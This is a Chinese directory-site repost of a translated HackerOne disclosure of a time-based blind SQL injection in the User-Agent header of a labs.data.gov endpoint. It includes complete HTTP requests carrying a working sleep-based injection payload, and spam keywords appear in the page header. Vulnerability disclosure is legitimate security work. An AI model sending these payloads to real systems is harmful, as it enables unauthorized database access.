亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

公告:魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.430618.com 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

0x00漏洞信息

披露者:harisec

危害程度:高危

漏洞類型:sql注入

0x01漏洞介紹

通過訪問:

https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent頭在中進(jìn)行SQL注入

我沒有從數(shù)據(jù)庫中提取任何數(shù)據(jù),我已經(jīng)使用sleep函數(shù) SQL查詢確認(rèn)了該漏洞。該命令與算術(shù)操作相結(jié)合,將導(dǎo)致服務(wù)器響應(yīng)不同的時(shí)間取決于算術(shù)運(yùn)算的結(jié)果。

例如,將該值設(shè)置:

Mozilla/5.0 (windows NT 6.1; WOW64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

到User-Agent頭部將導(dǎo)致服務(wù)器延遲響應(yīng)25(5×5)秒。

要重現(xiàn),請(qǐng)發(fā)送以下HTTPS請(qǐng)求:

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR' X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

服務(wù)器將在25(5 * 5)秒后響應(yīng)-與User-Agent:標(biāo)頭的值相同。

現(xiàn)在,讓服務(wù)器立即響應(yīng)。我們將發(fā)送值sleep(5 * 5 * 0),它等于0。

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'

X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

服務(wù)器立即響應(yīng)為5 * 5 * 0 = 0。

讓我們通過另一個(gè)請(qǐng)求進(jìn)行確認(rèn):

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'

X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

這次,有效負(fù)載包含6 * 6-30,等于6。服務(wù)器在6秒鐘后響應(yīng)。

這些只是我嘗試確認(rèn)此問題的帶有各種算術(shù)運(yùn)算的SQL查詢中的一些。

0x02漏洞影響

攻擊者可以操縱發(fā)送到MySQL數(shù)據(jù)庫的SQL語句,并注入惡意SQL語句。攻擊者可以更改對(duì)數(shù)據(jù)庫執(zhí)行的SQL語句的命令。

翻譯自hackerone

分享到:
標(biāo)簽:注入 User Agent
用戶無頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績(jī)?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績(jī)?cè)u(píng)定